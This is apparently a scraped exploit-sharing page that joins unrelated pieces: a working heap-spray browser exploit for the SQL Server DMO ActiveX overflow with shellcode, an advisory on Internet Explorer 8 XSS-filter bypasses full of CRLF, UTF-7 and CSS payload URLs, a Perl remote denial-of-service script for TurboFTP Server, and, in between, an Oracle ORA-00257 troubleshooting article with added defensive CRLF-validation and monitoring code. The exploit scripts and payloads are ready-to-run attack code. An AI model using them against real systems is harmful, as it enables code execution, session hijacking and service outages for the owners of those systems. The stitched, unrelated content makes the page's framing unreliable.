
My first time, and I actually died right here

~~~~~ Posting. It's rare for me to post.

Clickbait, as expected!


Microsoft SQL Server Distributed Management Objects overflow
<!--
+ title: Microsoft SQL Server Distributed Management Objects Buffer Overflow
+ Critical: Critical (remote)
+ Impact: MS Internet Explorer 6 -> Code Execute
+ Tested Operating System: Windows XP SP2 KR, Windows 2000 Pro SP4 KR
+ Tested Software: MSDE 2000 SQLDMO.dll (version 2000.80.760.0)
+ Reference & Thanks :
     code by rgod http://www.milw0rm.com/exploits/4379
     code by Trirat Puttaraksa http://www.milw0rm.com/exploits/2426
+ Author: 96sysim (sysim@nate.com)
-->
<html>
<object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer' /></object>
<SCRIPT language="javascript">
// Heap Spray
// execute "calc.exe"
shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<501;i++) memory = block + shellcode;
</SCRIPT>
<script language='vbscript'>
targetFile = "C:ProgrammiMicrosoft SQL Server80ToolsBinnsqldmo.dll"
prototype  = "Sub Start ( ByVal StartMode As Boolean ,  [ ByVal Server As Variant ] ,  [ ByVal Login As Variant ] ,  [ ByVal Password As Variant ] )"
memberName = "Start"
progid     = "SQLDMO.SQLServer"
argCount   = 4
myseh        = unescape("%u0D0D%u0D0D")   // heap spray range - possible change
StartMode =True
Server    ="http://ZZZZYYYYXXXXWW?WVVVVAAAAAAAAAAAAAAAAAA@AA        es        est        est        es.        
testMMMMLLLLKKKJJJJIIIIHH.HGGGGGFFFFEEEEDDDDDDDBBBBAAAA\\\\:#$%AAAABBBBCCCCDD?DEEEEFFFFGGG\:#$%HHHHHIIII        e@st        es        est        est        es.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaaaa" + myseh + "Dmmm" + edx + "nnnBBBBAAAAZZ\\\\:#$%YYYYXXXXWWWWVV?VUUUUTTTTSSS\:#$%RRRRRQQQQPP@PPOOONNNNMMMMLLL.KKKKKJJJJIIIIHHHGGGGFFFFEE.EDDDDDDDDDBBBBAAAAAAAAAAAAAAA\\\\:#$%AAAAAAAAAAAAAA?Awwwwvvvvuuu\:#$%        ttttssss
r@rrqqqppppoooo
nn.mmmmmllllkkkkjjjiiiihhhhgg.gfffffeeeeddddcccbbbaaaaAAAA\\\"Login     ="aaaaaaaa"Password  ="bbbbbbbb"SQLServer.Start StartMode ,Server ,Login ,Password</script></html>

Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities, please follow.


IE 8.0 Beta 2 Anti-XSS issues
Aspect9: Internet Explorer 8.0 Beta 2 Anti-XSS Filter Vulnerabilities
Release Date: December 11, 2008
Date Reported: October 5, 2008
Severity: Medium-High (Execute scripts, Turning Protection Off, Transfer data Cross Domains)
Vendor: Microsoft
Systems Affected: Windows Platform with Internet Explorer 8.0 Beta 2

Overview:
Aspect9 has discovered several vulnerabilities in Microsoft Windows Internet Explorer 8.0 Beta 2. This new version of Microsoft's famous browser includes new security improvements such as a Cross Site Scripting (XSS) filter. This version also includes a new object that safely allows transferring data across domains, allowing them to interact with each other.

The Anti-XSS filter has been found to have some security holes in the current implementation. Microsoft decided to filter "Type 1 XSS", which is free text sent to the server being reflected to the user and therefore injecting HTML code into the website's page. They chose not to handle certain situations such as injection into a JavaScript tag space, which would be extremely difficult to filter. The software giant also chose not to filter injection into HTTP headers, which will drive hackers to focus on discovering CRLF vulnerabilities.

A quote of Microsoft's Anti-XSS filter design philosophy:
<<<
"Like all security mitigation and protection technologies, the XSS Filter's approach does have limitations, being that it is a pragmatic balance between application compatibility, security, and performance.

Some examples:
* Injection into some contexts is not blocked. Ex: Scenarios where content can be injected directly into JavaScript without breaking out of a string.
* Injections facilitated by some HTTP headers are not currently blocked. Ex: "Referer" based injection.
* If a page contains multiple nearby injection points, attacks can be constructed that thwart the XSS Filter."
>>>

For more information about the Anti-XSS filter:
http://blogs.msdn.com/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx

In order to understand the contents of this advisory, the reader must be familiar with the concept of CRLF, which is distinguished from CSRF.
http://www.owasp.org/index.php/CRLF_Injection
http://www.owasp.org/index.php/CSRF
Technical Details:

Bypass using CRLF+Encodings:
---------------------------------------------
Microsoft Windows Internet Explorer 8.0 Beta 2 was designed to stop "Type 1 XSS" attacks. CRLF Injection is also XSS type 1 and is not mitigated by the filter, though the data in the query string will still be filtered. This means that if an attacker tries to exploit a CRLF for XSS in the casual manner, used in this demo:
http://www.sitedir.com.cn/crlf.py?url=cookie1%3dvalue1;%0D%0A%0D%0A<html><body><script>alert('get it?')</script></body></html>
his attack will fail, as "<script>" will be filtered to "<sc#ipt>".

However, an attacker can inject a content-type header and overwrite the page charset and therefore bypass the XSS filter, which uses the prior encoding. A good example for this is with utf-7, the following request:
http://www.sitedir.com.cn/crlf.py?url=cookie1%3dvalue1;%0d%0aContent-Type: text/html; charset%3dutf-7%0d%0a%0d%0a<html><body>+ADw-script+AD4-alert('owned')+ADw-/script+AD4-</body></html>

This will result in:

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-7
Server: Microsoft-IIS/6.0
Set-Cookie: url=cooki1=value1;
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sun, 05 Oct 2008 23:46:11 GMT
Connection: close

<html><body>+ADw-script+AD4-alert('owned')+ADw-/script+AD4-</body></html>;Content-Type: text/html

This will be rendered as utf-7 and will execute.
Bypass using CRLF+"X-XSS-Protection":
-------------------------------------------------------
In addition to the problem of CRLF being able to re-write the page and bypass the filter using a different encoding than the one of the page, Microsoft were kind enough to leave a backdoor AKA feature for developers to turn the filter off. This header is called "X-XSS-Protection" and takes a Boolean value of 0 or 1. By injecting "X-XSS-Protection: 0" through CRLF, an attacker can shut down the XSS protection for the current request.

Demo:
http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<html><body><script>alert('owned')</script></body></html>

Of course the problem goes further, to any HTTP header that can be used maliciously: setting cookies and thereby switching to a different user than the one logged on, such as stealing their cookie and then replacing it with the cookie of a bulk user and therefore taking over their session; using the "Location:" header to redirect pages and internal frames/iframes to look-a-like phishing websites; etc.

Demos:
http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aLocation:http://www.micros0ft.com%0d%0a%0d%0a
http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aSet-Cookie:sessionid%3dblablablabla_bulk_user_md5_sessionid%0d%0a%0d%0a<html><body>The server is busy, try again in 30 minutes</body></html>

CRLF+"XDomainRequestAllowed" --> XDomainRequest Enabling:
---------------------------------------------------------
Having a CRLF injection already gives an attacker the ability to overwrite the HTTP response BODY, which means he can create a new hidden image/frame/form and send data through it, data such as the domain's cookie. But it is clear that overwriting the body using CRLF and making it look the same requires a "fetcher" server side script on the same domain. Also a network filter or a WAF may deny injection of a double CRLF (%0d%0a%0d%0a). As time goes by and security evolves, the attacker should have a harder time sending this information out silently.

In IE8, there is a new object called "XDomainRequest" which is designed to allow safe data exchange across domains.
More information at:
http://msdn.microsoft.com/en-us/library/cc288108(VS.85).aspx

The browser will only allow the client (the JavaScript code) to interact with that website if the website returns the "XDomainRequestAllowed" Boolean header.

Using CRLF to inject the XDomainRequestAllowed header, an attacker can interact in a CROSS DOMAIN mode with that website without its consent, as the consent is being faked by the injected header. This attack concept on the XDomainRequest in general should be named "XAI" (XDR Allowed Injection).

This is a demo request to a CRLF vulnerable web page:
http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aXDomainRequestAllowed: 1

This is how the attacker's script would look:
------------------------------------------------
<script>
try {
     xdr = new XDomainRequest();
     xdr.onload = function() {
       alert(xdr.responseText);
     }
     xdr.open("GET", "http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aXDomainRequestAllowed: 1");
     xdr.send("");
} catch (e) {
   alert(e.description)
}
</script>
------------------------------------------------
The attacker can now transfer data to/from that domain to other domains with just 1 header injection, a new, by design weapon to replace leaking data with XSS. An attacker can use the new feature to interact with web servers (i.e. send and receive data from those domains) by pretending to have the authorization to do so, using a single CRLF header injection. This is an ultimate vulnerability that exploits this new feature to enable easy information data leakage and cross domain attacks.
UTF-7 Websites are not filtered:
-------------------------------------------
When the page charset is set to utf-7, whether by the http header or by a meta tag, the Anti-XSS filter will not apply on this page, allowing utf-7 encoded injected html code to execute. In other words, utf-7 content sent to utf-7 encoded web pages is not filtered, therefore allowing XSS attacks on utf-7 web pages.

I must admit that I have never met a website written in utf-7 for non-malicious purposes, but it is still a feature and there are many websites that implement language templates and receive the charset as a parameter from the query string or the cookie.

Demos:
http://www.sitedir.com.cn/xssurlnoparams.py/+AD4-+ADw-script+AD4-alert('see?')+ADw-/script+AD4-+ADw-div
http://www.sitedir.com.cn/xssurlnoparams.py?data=+AD4-+ADw-script+AD4-alert('see?')+ADw-/script+AD4-+ADw-div

Direct bypass using any double injection:
-----------------------------------------
A quote from the filter's architecture implementation:
<<<
"If a page contains multiple nearby injection points, attacks can be constructed that thwart the XSS Filter."
>>>
Well, that is not accurate.

ANY second appearance of the injected data will allow execution of script code. The concept is that data inside tags such as script and style is parsed by their own parser.

The CSS (style) parser has 2 characteristics that differentiate it from the script parser:
1) It is a silent parser (there is no indication of failure)
2) It executes as batch operations per block, which means that closing A NON EXISTING (never opened) block will cause parsing of the following blocks. What does this mean?!?!

It means that in a quite common scenario, any text injected just twice at any position inside the HTML of the page (except inside textarea/script/style tags; these can also be fixed by putting </textarea> in a css comment) will cause, at the first point where the code is injected into the page,

} BODY{a:expression(alert('hi'))};</style>***<style>***

a style tag to be opened, and anything after it will be ignored by a silent css parser error; on the second injection:

***} BODY{a:expression(alert('hi'))};</style>***<style>

a new style block will be opened and rendered, and this would automatically execute script code!

Demo:
http://www.sitedir.com.cn/doublexss.py?username=} BODY{a:expression(alert('hi'))};</style><style>
Filter False Positives:
-----------------------
The following text sent to a page as parameters will trigger a false-positive match by the Anti-XSS filter:

<"script">alert('innocent code')</script>
<'script'>alert('innocent code')</script>
"<[whatever]script>alert('innocent code')</script>

The following should trigger on most CSS design forums with a preview feature:
<style>@import</style>
<style>x:y(1)</style>

This means that a CSS tutorial web page cannot send to itself or to another page the following raw text (whether it will be treated as text or as HTML by the receiving page):

<style>color:rgb(1,2,3)</style>

Vendor Status:
Microsoft's response regarding the CRLF issues:
"We will not be led to compromise the XSS Filter's web site compatibility by attempting to address every conceivable XSS attack scenario."

Microsoft's response regarding the STYLE issue:
"We hope we can get a change in prior to IE8 RC1"

Microsoft's response regarding the "filter not applied in UTF-7 Websites":
"Behaviour is by design"

Credit: Rafel Ivgi

Greetings: David Ross, the_pull, Arkon, JonD, lorgandon, xbxice, Budo, Reiter, Inga, Lucid, h.p.c, Dror Shalev, Liu Die Yu, wir3less, Zull, 0fir0, dbrod, ax1les, whitehawkofjustice

Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
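Every CRLF bypass in the advisory above starts with a server echoing request data (here the `url` parameter) into a response header without checking it for CR and LF. The Python below is an added example, not code from the advisory or from Microsoft's filter: a response-header builder that rejects control characters outright, and a detector that lists the header names smuggled after a line break in a decoded query value, which is the check a WAF rule or a log pipeline would run. Function names are my own; the test inputs are the advisory's demo payloads.

```python
"""Server-side defence against CRLF injection (HTTP response splitting).

Added example; not code from the advisory. Function names are my own.
"""
import re
from urllib.parse import unquote

# RFC 7230 token characters: the only characters a header name may contain.
_TOKEN = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")
# CR, LF and every other C0 control (plus DEL) are rejected in values: one
# CR or LF is enough to terminate the header and start a new one.
_CTL = re.compile(r"[\x00-\x1f\x7f]")


class HeaderInjection(ValueError):
    """Raised when request data would split the response."""


def is_safe_header_value(value: str) -> bool:
    return _CTL.search(value) is None


def safe_header(name: str, value: str) -> str:
    """Return 'Name: value', or raise if either part could split the response."""
    if not _TOKEN.fullmatch(name):
        raise HeaderInjection(f"illegal header name {name!r}")
    if not is_safe_header_value(value):
        raise HeaderInjection(f"control character in value of {name!r}")
    return f"{name}: {value}"


def build_response_head(status_line: str, headers: list[tuple[str, str]]) -> str:
    """Assemble the head of an HTTP response; every header is validated first."""
    lines = [status_line] + [safe_header(n, v) for n, v in headers]
    return "\r\n".join(lines) + "\r\n\r\n"


def injected_headers(query_value: str) -> list[str]:
    """List header names that appear after a line break in a decoded query value.

    Benign values yield []. The advisory's demo payloads yield the header the
    request was trying to add (content-type, x-xss-protection, set-cookie,
    location, xdomainrequestallowed). The value is percent-decoded once, as a
    server framework would do before echoing it.
    """
    decoded = unquote(query_value)
    names = []
    for line in re.split(r"\r\n|\r|\n", decoded)[1:]:
        m = re.match(r"\s*([A-Za-z][A-Za-z0-9-]*)\s*:", line)
        if m:
            names.append(m.group(1).lower())
    return names


if __name__ == "__main__":
    # Constructed request value modelled on the advisory's X-XSS-Protection demo.
    evil = "cooki1%3dvalue1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<html><body></body></html>"
    print("smuggled headers:", injected_headers(evil))
    try:
        # The demo server stored the raw value in Set-Cookie; the builder refuses it.
        build_response_head("HTTP/1.1 200 OK", [("Set-Cookie", "url=" + unquote(evil))])
    except HeaderInjection as exc:
        print("rejected:", exc)
```

Rejecting the value is preferable to stripping CR/LF: a stripped value silently changes what the application stores, while a rejection surfaces the attempt in logs, which is where the detector output belongs as well.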





Troubleshooting an ORA-00257 error on an Oracle database
Overview:
  Oracle Database is the most widely used large-scale database system in the industry today. In an actual project I ran into an ORA-00257 error (an out-of-space error). Most of the material I found says it is caused by too many archive logs consuming all of the remaining disk space, and that it can be fixed simply by deleting logs or adding storage. But on Oracle 10g I found that plenty of storage space was still free and the error was reported anyway. It turned out to be caused by a new feature in Oracle 10g: management of the Flash Recovery Area.
  1. Hardware and software environment
  Server: HP Proliant DL580G4 (Intel Xeon 3.16GHz/4GB/72.8*4/RAID4)
  Operating system: Red Flag DC Server release 5.0 (Trinity) for x86-64 Linux
  Database: Oracle 10.2.0.1.0
  2. Symptoms
  The database system had been in trial operation for a little over half a month. On the evening of July 24, after connecting to the database and performing a data update, an ORA-00257 error appeared, as shown in the figure below.
  [Figure: ORA-00257 error after connecting to the database and performing a data update]
  The message indicates an archiving error. Looking up the ORACLE error code, it is explained as insufficient disk space: archive logs need to be deleted to free space. But the server had 200GB of available space, of which only about 10GB was in use. So why was this happening?
  3. Diagnosis:
  1) Check the ORACLE database archive log situation
[root@hrmsdb /]# cd /oracle/flash_recovery_area/HKCHR/archivelog
[root@hrmsdb archivelog]# ls
2006_07_04 2006_07_13 2006_07_17 2006_07_20 2006_07_23
2006_07_11 2006_07_14 2006_07_18 2006_07_21 2006_07_24
2006_07_12 2006_07_15 2006_07_19 2006_07_22 2006_07_25
[root@hrmsdb archivelog]# cd 2006_07_25
[root@hrmsdb 2006_07_25]# ls
[root@hrmsdb 2006_07_25]# cd ../2006_07_24
[root@hrmsdb 2006_07_24]# ls
o1_mf_1_92_2d933vgb_.arc o1_mf_1_96_2d954ns7_.arc o1_mf_1_98_2d969d5h_.arc
o1_mf_1_95_2d9537cs_.arc o1_mf_1_97_2d956km0_.arc
  This shows that archiving had been working normally before the problem occurred.
  2) Check the database REDO LOG status
[oracle@hrmsdb ~]$ sqlplus /nolog
SQL*Plus: Release 10.2.0.1.0 - Production on 星期二 7月 25 10:44:18 2006
Copyright (c) 1982, 2005, Oracle. All rights reserved.
SQL> connect / as sysdba
已连接。
SQL> select * from v$log;
GROUP# THREAD# SEQUENCE# BYTES MEMBERS ARC STATUS FIRST_CHANGE# FIRST_TIME
---------- ---------- ---------- ---------- ---------- --- --------------------------------------- --------------
1 1 101 52428800 1 NO CURRENT 3621973 24-7月 -06
2 1 99 52428800 1 NO INACTIVE 3600145 24-7月 -06
3 1 100 52428800 1 NO INACTIVE 3611932 24-7月 -06
  The ARC status is NO, which means the system is unable to archive automatically.
  3) Manually switch the log file
SQL> alter system switch logfile;
alter system switch logfile
*
第 1 行出现错误:
ORA-01013: 用户请求取消当前的操作
  After waiting a long time with no response, the operation was interrupted; the manual log switch did not succeed.
  4) Check the Oracle database background archiver processes
[oracle@hrmsdb ~]$ ps -ef|grep oracle
oracle 4601 1 0 Jul11 ? 00:00:04 /oracle/product/10.2.0/db_1/bin/
tnslsnr LISTENER -inherit
oracle 5025 1 0 Jul11 ? 00:00:00 /usr/bin/ssh-agent -s
oracle 20923 1 0 Jul24 ? 00:00:01 ora_pmon_hkchr
oracle 20925 1 0 Jul24 ? 00:00:00 ora_psp0_hkchr
oracle 20927 1 0 Jul24 ? 00:00:00 ora_mman_hkchr
oracle 20929 1 0 Jul24 ? 00:00:01 ora_dbw0_hkchr
oracle 20931 1 0 Jul24 ? 00:01:07 ora_lgwr_hkchr
oracle 20933 1 0 Jul24 ? 00:00:05 ora_ckpt_hkchr
oracle 20935 1 0 Jul24 ? 00:00:01 ora_smon_hkchr
oracle 20937 1 0 Jul24 ? 00:00:00 ora_reco_hkchr
oracle 20939 1 0 Jul24 ? 00:00:00 ora_cjq0_hkchr
oracle 20941 1 0 Jul24 ? 00:00:01 ora_mmon_hkchr
oracle 20943 1 0 Jul24 ? 00:00:05 ora_mmnl_hkchr
oracle 20945 1 0 Jul24 ? 00:00:00 ora_d000_hkchr
oracle 20947 1 0 Jul24 ? 00:00:00 ora_s000_hkchr
oracle 20953 1 0 Jul24 ? 00:09:41 ora_arc0_hkchr
oracle 20955 1 1 Jul24 ? 00:10:29 ora_arc1_hkchr
oracle 20959 1 0 Jul24 ? 00:00:00 ora_qmnc_hkchr
oracle 20967 1 0 Jul24 ? 00:00:00 ora_q000_hkchr
oracle 20969 1 0 Jul24 ? 00:00:00 ora_q001_hkchr
oracle 21715 1 0 Jul24 ? 00:00:19 oraclehkchr (LOCAL=NO)
oracle 21765 1 0 Jul24 ? 00:00:00 ora_j000_hkchr
oracle 21816 1 0 Jul24 ? 00:00:00 ora_j001_hkchr
oracle 21832 1 0 Jul24 ? 00:00:00 ora_j002_hkchr
oracle 21839 1 0 Jul24 ? 00:00:00 ora_j003_hkchr
oracle 21859 1 0 Jul24 ? 00:00:00 ora_j004_hkchr
oracle 21861 1 0 Jul24 ? 00:00:00 ora_j005_hkchr
oracle 21886 1 0 Jul24 ? 00:00:00 ora_j006_hkchr
oracle 21888 1 0 Jul24 ? 00:00:00 ora_j007_hkchr
root 23187 23186 0 10:39 ? 00:00:00 login -- oracle
oracle 23188 23187 0 10:39 pts/0 00:00:00 -bash
oracle 23216 23188 0 10:39 pts/0 00:00:00 sqlplus
oracle 23217 23216 0 10:39 ? 00:00:00 oraclehkchr (DESCRIPTION=(LOCAL=
YES)(ADDRESS=(PROTOCOL=beq)))
root 23224 23223 0 10:40 ? 00:00:00 login -- oracle
oracle 23225 23224 0 10:40 pts/1 00:00:00 -bash
oracle 23310 23225 0 10:46 pts/1 00:00:00 ps -ef
oracle 23311 23225 0 10:46 pts/1 00:00:00 grep oracle
[oracle@hrmsdb ~]$
The background processes are all running normally.
  5) Check FLASH_RECOVERY_AREA space usage
[root@hrmsdb /]# cd /oracle
[root@hrmsdb oracle]# ls
admin flash_recovery_area oraInventory product
[root@hrmsdb oracle]# du -a -k flash_recovery_area
4 flash_recovery_area/HKCHR/onlinelog
42456 flash_recovery_area/HKCHR/archivelog/2006_07_15/o1_mf_1_74_2cj1h1jz_.arc
……………….
42448 flash_recovery_area/HKCHR/archivelog/2006_07_14/o1_mf_1_68_2cfzwwvt_.arc
512560 flash_recovery_area/HKCHR/archivelog/2006_07_14
1469224 flash_recovery_area/HKCHR/archivelog
6988 flash_recovery_area/HKCHR/backupset/2006_07_04/o1_mf_ncsnf_TAG20060704T1
74229_2bng1o0b_.bkp
876916 flash_recovery_area/HKCHR/backupset/2006_07_04/o1_mf_nnndf_TAG20060704T1
74229_2bng0cx4_.bkp
883908 flash_recovery_area/HKCHR/backupset/2006_07_04
883912 flash_recovery_area/HKCHR/backupset
2353144 flash_recovery_area/HKCHR
2353148 flash_recovery_area
[root@hrmsdb oracle]#
The FLASH_RECOVERY_AREA is using 2.35GB.
  6) Check the usage of each component within the FLASH_RECOVERY_AREA
SQL> select * from v$recovery_file_dest;
NAME SPACE_LIMIT SPACE_USED SPACE_RECLAIMABLE NUMBER_OF_FILES
------------------------------------------------------------------------------------------------------------------
/oracle/flash_recovery_area 2147483648 2134212608 0 35
SQL> select * from v$flash_recovery_area_usage;
FILE_TYPE PERCENT_SPACE_USED PERCENT_SPACE_RECLAIMABLE NUMBER_OF_FILES
------------ ------------------ ------------------------- ---------------- -------------- -------------- -------------
CONTROLFILE 0 0 0
ONLINELOG 0 0 0
ARCHIVELOG 69.97 0 40
BACKUPPIECE 30.01 0 2
IMAGECOPY 0 0 0
FLASHBACKLOG 0 0 0
已选择6行。
  ARCHIVELOG occupies nearly 70% and BACKUPPIECE 30%, so the FLASH_RECOVERY_AREA is completely full.
  4. Resolution
  Given that the database currently has 200GB of available storage while the FLASH_RECOVERY_AREA is only 2GB, the FLASH_RECOVERY_AREA size was changed to 20GB.
SQL> alter system set DB_RECOVERY_FILE_DEST_SIZE=20g;
系统已更改。
SQL> select * from v$recovery_file_dest;
------------------------------------------------------- ---------- -----------------------------------
NAME SPACE_LIMIT SPACE_USED SPACE_RECLAIMABLE NUMBER_OF_FILES
----------- ---------- ----------------- ------------- -------------- ---------- ---------- ------------
/oracle/flash_recovery_area 2.1475E+10 2264587776 0 38
  Checking the log status again, the REDO LOG is now archiving normally.
SQL> select * from v$log;
GROUP# THREAD# SEQUENCE# BYTES MEMBERS ARC STATUS FIRST_CHANGE# FIRST_TIME
---------- ---------- ---------- ---------- ---------- --- -------------------------------------------- --------------
1 1 101 52428800 1 YES ACTIVE 3621973 24-7月 -06
2 1 102 52428800 1 NO CURRENT 3650399 25-7月 -06
3 1 100 52428800 1 YES INACTIVE 3611932 24-7月 -06
SQL> select * from v$flash_recovery_area_usage;
FILE_TYPE PERCENT_SPACE_USED PERCENT_SPACE_RECLAIMABLE NUMBER_OF_FILES
------------ ------------------ ------------------------- ---------------
CONTROLFILE 0 0 0
ONLINELOG 0 0 0
ARCHIVELOG 7.6 0 43
BACKUPPIECE 4.21 0 2
IMAGECOPY 0 0 0
FLASHBACKLOG 0 0 0
已选择6行。
SQL>
  5. Summary
  This fault was caused by two things occurring at the same time:
  · First, the Flash_Recovery_Area is fairly small in a default installation, only 2GB, and is easily used up;
  · Second, backups are taken in archive mode through Veritas, and because the backup software was not running, the archive logs were not deleted in time.
  From resolving this fault we can draw the following lessons:
  · Oracle 10g manages physical space differently from earlier Oracle releases: it imposes a separate limit on the Flash_Recovery_Area where archive logs reside;
  · Database administrators should regularly check the state of Oracle archive logs and of the backup software, so that potential failures are detected and handled in advance.
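The article's lesson is that the two queries in step 6 are what should be watched routinely, and that reclaimable space (0 here, because backups had not run) matters more than the raw size of the disk. The following Python is an added example, not part of the article: it parses the output of `select * from v$recovery_file_dest` and `select * from v$flash_recovery_area_usage` exactly as SQL*Plus printed them above and turns them into an OK/WARNING/CRITICAL verdict. The thresholds and function names are my own choices; the embedded sample rows are copied from the article.

```python
"""Check Flash Recovery Area (FRA) headroom from SQL*Plus output.

Added example; not part of the article. Thresholds and function names are my
own choices. Sample output below is copied from the article's two queries.
"""
from dataclasses import dataclass

WARN_PCT = 85.0   # assumed warning threshold
CRIT_PCT = 97.0   # assumed critical threshold


@dataclass
class FraStatus:
    name: str
    limit_bytes: float
    used_bytes: float
    reclaimable_bytes: float
    files: int

    @property
    def used_pct(self) -> float:
        return 100.0 * self.used_bytes / self.limit_bytes

    @property
    def net_used_pct(self) -> float:
        """Usage after discounting space Oracle can reclaim by itself.

        A full FRA with 0 reclaimable bytes is what blocks the archiver and
        produces ORA-00257, so this is the number the verdict is based on.
        """
        return 100.0 * (self.used_bytes - self.reclaimable_bytes) / self.limit_bytes

    @property
    def level(self) -> str:
        if self.net_used_pct >= CRIT_PCT:
            return "CRITICAL"
        if self.net_used_pct >= WARN_PCT:
            return "WARNING"
        return "OK"


def parse_recovery_file_dest(text: str) -> FraStatus:
    """Parse the data row of `select * from v$recovery_file_dest`.

    SQL*Plus switches to scientific notation (2.1475E+10) when a number
    outgrows its column width, so all sizes are read as floats.
    """
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0].startswith("/"):
            name, limit, used, recl, nfiles = parts
            return FraStatus(name, float(limit), float(used), float(recl), int(nfiles))
    raise ValueError("no data row found in v$recovery_file_dest output")


FILE_TYPES = ("CONTROLFILE", "ONLINELOG", "ARCHIVELOG",
              "BACKUPPIECE", "IMAGECOPY", "FLASHBACKLOG")


def parse_usage_breakdown(text: str) -> dict[str, float]:
    """Parse `select * from v$flash_recovery_area_usage` into {FILE_TYPE: % used}."""
    usage = {}
    for line in text.splitlines():
        parts = line.split()
        if parts and parts[0] in FILE_TYPES:
            usage[parts[0]] = float(parts[1])
    return usage


def fra_report(dest_text: str, usage_text: str) -> str:
    """One-line verdict naming the file type that consumes most of the FRA."""
    st = parse_recovery_file_dest(dest_text)
    usage = parse_usage_breakdown(usage_text)
    top = max(usage, key=usage.get) if usage else "n/a"
    return (f"{st.level}: {st.name} {st.used_pct:.1f}% used "
            f"({st.net_used_pct:.1f}% after reclaim), {st.files} files, "
            f"largest consumer {top} at {usage.get(top, 0):.2f}%")


# Rows copied from the article, before and after raising DB_RECOVERY_FILE_DEST_SIZE.
DEST_BEFORE = """\
NAME SPACE_LIMIT SPACE_USED SPACE_RECLAIMABLE NUMBER_OF_FILES
/oracle/flash_recovery_area 2147483648 2134212608 0 35
"""
USAGE_BEFORE = """\
FILE_TYPE PERCENT_SPACE_USED PERCENT_SPACE_RECLAIMABLE NUMBER_OF_FILES
CONTROLFILE 0 0 0
ONLINELOG 0 0 0
ARCHIVELOG 69.97 0 40
BACKUPPIECE 30.01 0 2
IMAGECOPY 0 0 0
FLASHBACKLOG 0 0 0
"""
DEST_AFTER = """\
NAME SPACE_LIMIT SPACE_USED SPACE_RECLAIMABLE NUMBER_OF_FILES
/oracle/flash_recovery_area 2.1475E+10 2264587776 0 38
"""

if __name__ == "__main__":
    print(fra_report(DEST_BEFORE, USAGE_BEFORE))
    print(fra_report(DEST_AFTER, USAGE_BEFORE))
```

Run from cron against `sqlplus -s` output, the CRITICAL line for the "before" state would have fired hours before the archiver stalled, and the breakdown points straight at the backups that had stopped deleting archive logs.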



TurboFTP-Server-1.00.712-Remote-DoS
# Exploit Title : TurboFTP Server 1.00.712 Remote DoS
# Date          : 30 december 2009
# Author        : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Bug found by  : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Software Link : http://www.tbsoftinc.com/download/tbftpsrv.exe
# Version       : 1.00.712
# Issue fixed in: 1.00.720
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : DoS
# Greetz to     : Corelan Security Team::EdiStrosar/Ricks2600/MarkoT/mr_me/ekse
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
# Code :
print "|------------------------------------------------------------------|
";
print "|                         __               __                       |
";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
";
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
";
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
";
print "|                                                                  |
";
print "|                                       http://www.corelan.be:8800 |
";
print "|                                                                  |
";
print "|-------------------------------------------------[ EIP Hunters ]--|

";
print "[+] DoS exploit for TurboFTP Server 1.00.712
";

use IO::Socket;

if ($#ARGV ne 3) {
print "
  usage: $0 <targetip> <targetport> <user> <password>
";
exit(0);
}

my $user=$ARGV[2];
my $pass=$ARGV[3];

print " [+] Preparing DoS payload
";
my $payload = "A" x 2000;
print " [+] Connecting to server $ARGV[0] on port $ARGV[1]
";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => $ARGV[1],
                              Proto    => 'tcp');

$ftp = <$sock> || die " [!] *** Unable to connect ***
";
print "   ** $ftp";
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Logging in (user $user)
";
print $sock "USER $user
";
$ftp = <$sock>;
print "   ** $ftp";
print $sock "PASS $pass
";
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Sending payload
";
print $sock "DELE ".$payload."
";
$ftp = <$sock>;
print "   ** $ftp";
